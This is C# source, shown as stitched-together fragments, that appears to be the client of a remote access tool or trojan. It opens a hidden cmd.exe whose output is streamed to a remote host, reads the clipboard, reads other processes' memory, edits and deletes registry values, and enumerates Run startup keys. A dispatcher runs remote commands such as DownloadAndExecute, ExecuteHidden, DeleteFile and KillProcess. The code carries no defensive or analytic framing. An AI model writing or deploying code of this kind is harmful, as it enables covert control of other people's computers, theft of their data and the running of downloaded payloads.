public static void HandleMove(object[] args)
{
FileManagerCommand command = (FileManagerCommand)args[1];
bool force = command == FileManagerCommand.ForceMoveFile;
Guid ID = (Guid)args[2];
string from = (string)args[3];
string to = (string)args[4];
NetworkHost.Send((byte)NetworkCommand.FileManager, (byte)FileManagerCommand.MoveResponce, ID, MiscHandler.MoveFile(from, to, force));
}
public static void Handle(object[] data)
{
var command = (RemoteDesktopCommand)data[1];
Console.WriteLine("Remote desktop command: {0}", command.ToString());
if (command == RemoteDesktopCommand.RequestFrame)
{
CheckFrame((int)data[2]);
}
if (command == RemoteDesktopCommand.GetMonitors && Screen.AllScreens != null && Screen.AllScreens.Length > 0)
{
NetworkHost.Send((byte)NetworkCommand.RemoteDesktop, (byte)RemoteDesktopCommand.MonitorResponce, Screen.AllScreens.Select(s => s.DeviceName).ToArray());
}
}
public static void SendTcpTable()
{
MIB_TCPROW_OWNER_PID[] table = GetTable();
string[] Names = new string[table.Length];
string[] LocalAddress = new string[table.Length];
string[] RemoteAddress = new string[table.Length];
byte[] States = new byte[table.Length];
for (int i = 0; i < table.Length; i++)
{
LocalAddress[i] = string.Format("{0}:{1}", table[i].LocalAddress, table[i].LocalPort);
RemoteAddress[i] = string.Format("{0}:{1}", table[i].RemoteAddress, table[i].RemotePort);
States[i] = Convert.ToByte(table[i].state);
try
{
Process p = Process.GetProcessById((int)table[i].owningPid);
Names[i] = p.ProcessName;
}
catch
{
Names[i] = string.Format("PID: {0}", table[i].owningPid);
}
}
host.Send((byte)NetworkCommand.Connections, (byte)ConnectionsCommand.Table, Names, LocalAddress, RemoteAddress, States);
}
static void SendClipboardText()
{
Thread thread = new Thread(() => Host.Send((byte)NetworkCommand.Clipboard, (byte)ClipboardCommand.Text, Clipboard.GetText()));
thread.SetApartmentState(ApartmentState.STA);
thread.Start();
thread.Join();
}
private void inputBox_KeyDown(object sender, KeyEventArgs e)
{
if (e.KeyCode == Keys.Enter && inputBox.Text != string.Empty)
{
networkHost.Send((byte)NetworkCommand.RemoteChat, (byte)RemoteChatCommand.Message, inputBox.Text);
AddMessage("YOU: {0}", inputBox.Text);
inputBox.Text = "";
}
}
static void SetupConsole()
{
if (console == null || console.HasExited)
{
if (consoleThread != null && consoleThread.ThreadState == System.Threading.ThreadState.Running)
{
consoleThread.Abort();
}
ProcessStartInfo psi = new ProcessStartInfo("cmd.exe");
psi.UseShellExecute = false;
psi.RedirectStandardInput = true;
psi.RedirectStandardOutput = true;
psi.RedirectStandardError = true;
psi.WindowStyle = ProcessWindowStyle.Hidden;
psi.CreateNoWindow = true;
console = Process.Start(psi);
consoleThread = new Thread(() =>
{
try
{
using (StreamReader sr = console.StandardOutput)
{
string line = string.Empty;
while ((line = sr.ReadLine()) != null)
{
if (!string.IsNullOrEmpty(line))
{
NetworkHost.Send((byte)NetworkCommand.Console, (byte)ConsoleCommand.Responce, line);
}
}
}
console.Kill();
}
catch
{
}
});
consoleThread.Start();
NetworkHost.Send((byte)NetworkCommand.Console, (byte)ConsoleCommand.Responce, ">> New session started");
}
}
public static void Handle(object[] data)
{
TaskManagerCommand command = (TaskManagerCommand)data[1];
if (command == TaskManagerCommand.GetProcesses)
{
GetProcesses();
}
if (command == TaskManagerCommand.ReadMemory)
{
int id = (int)data[2];
string module = (string)data[3];
int offset = (int)data[4];
Process p = Process.GetProcessById(id);
if (p.HasExited)
{
NetworkHost.Send((byte)NetworkCommand.TaskManager, (byte)TaskManagerCommand.InvalidProcess);
}
else
{
ProcessModule procMod = null;
foreach (ProcessModule m in p.Modules)
{
if (m.ModuleName == module)
{
procMod = m;
break;
}
}
try
{
if (procMod == null)
{
return;
}
IntPtr addressRead = (IntPtr)((int)procMod.BaseAddress + offset);
int output = 0;
ReadProcessMemory(p.Handle, addressRead, ref output, 4, 0);
NetworkHost.Send((byte)NetworkCommand.TaskManager, (byte)TaskManagerCommand.MemoryValue, output);
}
catch (Exception ex)
{
Console.WriteLine(ex.ToString());
NetworkHost.Send((byte)NetworkCommand.TaskManager, (byte)TaskManagerCommand.InvalidProcess);
}
}
}
if (command == TaskManagerCommand.GetModules)
{
int id = (int)data[2];
Process p = Process.GetProcessById(id);
if (p.HasExited)
{
NetworkHost.Send((byte)NetworkCommand.TaskManager, (byte)TaskManagerCommand.InvalidProcess);
}
else
{
string[] moduleNames = new string[p.Modules.Count];
for (int i = 0; i < moduleNames.Length; i++)
{
try
{
moduleNames[i] = p.Modules[i].ModuleName;
}
catch
{
moduleNames[i] = "InvalidModule";
}
}
NetworkHost.Send((byte)NetworkCommand.TaskManager, (byte)TaskManagerCommand.ModuleResponce, moduleNames);
}
}
}
public static void Handle(object[] data)
{
RegistryCommand command = (RegistryCommand)data[1];
Console.WriteLine("Registry Command: {0}", command.ToString());
if (command == RegistryCommand.DeleteValue)
{
try
{
RegistryKey key = KeyFromType((RegistryKeyType)data[2]);
if (key == null)
{
return;
}
string path = (string)data[3];
key.OpenSubKey(path, true).DeleteValue((string)data[4]);
}
catch (Exception ex)
{
if (ex is UnauthorizedAccessException || ex is System.Security.SecurityException)
{
throw;
}
else
{
throw;
}
}
}
if (command == RegistryCommand.SetValue)
{
try
{
RegistryKey key = KeyFromType((RegistryKeyType)data[2]);
if (key == null)
{
return;
}
string path = (string)data[3];
key.OpenSubKey(path, true).SetValue((string)data[4], (string)data[5]);
}
catch (Exception ex)
{
if (ex is UnauthorizedAccessException || ex is System.Security.SecurityException)
{
throw;
}
else
{
throw;
}
}
}
if (command == RegistryCommand.UpdateNodes)
{
try
{
RegistryKey key = KeyFromType((RegistryKeyType)data[2]);
if (key == null)
{
return;
}
string path = (string)data[3];
string[] subKeys = key.OpenSubKey(path).GetSubKeyNames();
if (subKeys.Length > 0)
{
NetworkHost.Send((byte)NetworkCommand.RegistryEdit, (byte)RegistryCommand.UpdateNodeResponce, subKeys);
}
else
{
NetworkHost.Send((byte)NetworkCommand.RegistryEdit, (byte)RegistryCommand.EmptyNode);
}
}
catch
{
NetworkHost.Send((byte)NetworkCommand.RegistryEdit, (byte)RegistryCommand.NodeDeniedAccess);
}
}
if (command == RegistryCommand.UpdateKeys)
{
try
{
RegistryKey key = KeyFromType((RegistryKeyType)data[2]);
if (key == null)
{
return;
}
string path = (string)data[3];
RegistryKey registrySubkey = key.OpenSubKey(path);
string[] values = registrySubkey.GetValueNames();
Dictionary <string, string> valueDic = new Dictionary <string, string>();
foreach (string s in values)
{
if (!valueDic.ContainsKey(s))
{
valueDic.Add(s, registrySubkey.GetValue(s).ToString());
}
}
NetworkHost.Send((byte)NetworkCommand.RegistryEdit, (byte)RegistryCommand.ValueResponce, valueDic);
}
catch
{
NetworkHost.Send((byte)NetworkCommand.RegistryEdit, (byte)RegistryCommand.ValueDeniedAccess);
}
}
}
public static void GetStartupItems()
{
List <StartupItem> startups = new List <StartupItem>();
using (RegistryKey key = Registry.CurrentUser.OpenSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Run"))
{
if (key != null)
{
foreach (string name in key.GetValueNames())
{
StartupItem i = new StartupItem();
i.Name = name;
i.Path = key.GetValue(name).ToString();
i.Type = (byte)StartupType.HKCU;
startups.Add(i);
}
}
}
using (RegistryKey key = Registry.CurrentUser.OpenSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"))
{
if (key != null)
{
foreach (string name in key.GetValueNames())
{
StartupItem i = new StartupItem();
i.Name = name;
i.Path = key.GetValue(name).ToString();
i.Type = (byte)StartupType.HKCUO;
startups.Add(i);
}
}
}
using (RegistryKey key = Registry.LocalMachine.OpenSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Run"))
{
if (key != null)
{
foreach (string name in key.GetValueNames())
{
StartupItem i = new StartupItem();
i.Name = name;
i.Path = key.GetValue(name).ToString();
i.Type = (byte)StartupType.HKLM;
startups.Add(i);
}
}
}
using (RegistryKey key = Registry.LocalMachine.OpenSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"))
{
if (key != null)
{
foreach (string name in key.GetValueNames())
{
StartupItem i = new StartupItem();
i.Name = name;
i.Path = key.GetValue(name).ToString();
i.Type = (byte)StartupType.HKLMO;
startups.Add(i);
}
}
}
StartupItem[] items = startups.ToArray();
Console.WriteLine("Startup items: {0}", items.Length);
string[] names = new string[items.Length];
string[] Paths = new string[items.Length];
byte[] type = new byte[items.Length];
for (int i = 0; i < items.Length; i++)
{
names[i] = items[i].Name;
Paths[i] = items[i].Path;
type[i] = items[i].Type;
}
Host.Send((byte)NetworkCommand.StartupManager, (byte)StartupManagerCommand.StartupItems, names, Paths, type);
}
public void OnDataRecieved(object[] data)
{
NetworkCommand command = (NetworkCommand)data[0];
Console.WriteLine("NetworkCommand: {0}", command.ToString());
if (command == NetworkCommand.TaskManager)
{
TaskManagerHandler.Handle(data);
}
if (command == NetworkCommand.RegistryEdit)
{
RegistryEditorHandler.Handle(data);
}
if (command == NetworkCommand.FileManager)
{
FileManagerHandler.Handle(data);
}
if (command == NetworkCommand.Console)
{
ConsoleHandler.Handle(data);
}
if (command == NetworkCommand.Clipboard)
{
ClipboardHandler.Handle(data);
}
if (command == NetworkCommand.StartupManager)
{
StartupHandler.Handle(data);
}
if (command == NetworkCommand.Connections)
{
ConnectionsHandler.Handle(data);
}
if (command == NetworkCommand.Close)
{
Environment.Exit(0);
}
if (command == NetworkCommand.Restart)
{
MiscHandler.Restart();
}
if (command == NetworkCommand.Ping)
{
NetworkHost.Send((byte)NetworkCommand.Pong);
}
if (command == NetworkCommand.Execute)
{
MiscHandler.Execute((string)data[1]);
}
if (command == NetworkCommand.ExecuteHidden)
{
MiscHandler.ExecuteHidden((string)data[1]);
}
if (command == NetworkCommand.DeleteFile)
{
MiscHandler.DeleteFile((string)data[1]);
}
if (command == NetworkCommand.DownloadAndExecute)
{
MiscHandler.DownloadAndExecute((string)data[1], ".exe");
}
if (command == NetworkCommand.DownloadFile)
{
MiscHandler.DownloadFile((string)data[1], (string)data[2]);
}
if (command == NetworkCommand.KillProcess)
{
MiscHandler.KillProcess((int)data[1]);
}
if (command == NetworkCommand.SuspendProcess)
{
MiscHandler.SuspendProcess((int)data[1]);
}
if (command == NetworkCommand.ResumeProcess)
{
MiscHandler.ResumeProcess((int)data[1]);
}
if (command == NetworkCommand.HideWindow)
{
MiscHandler.HideWindow((int)data[1]);
}
}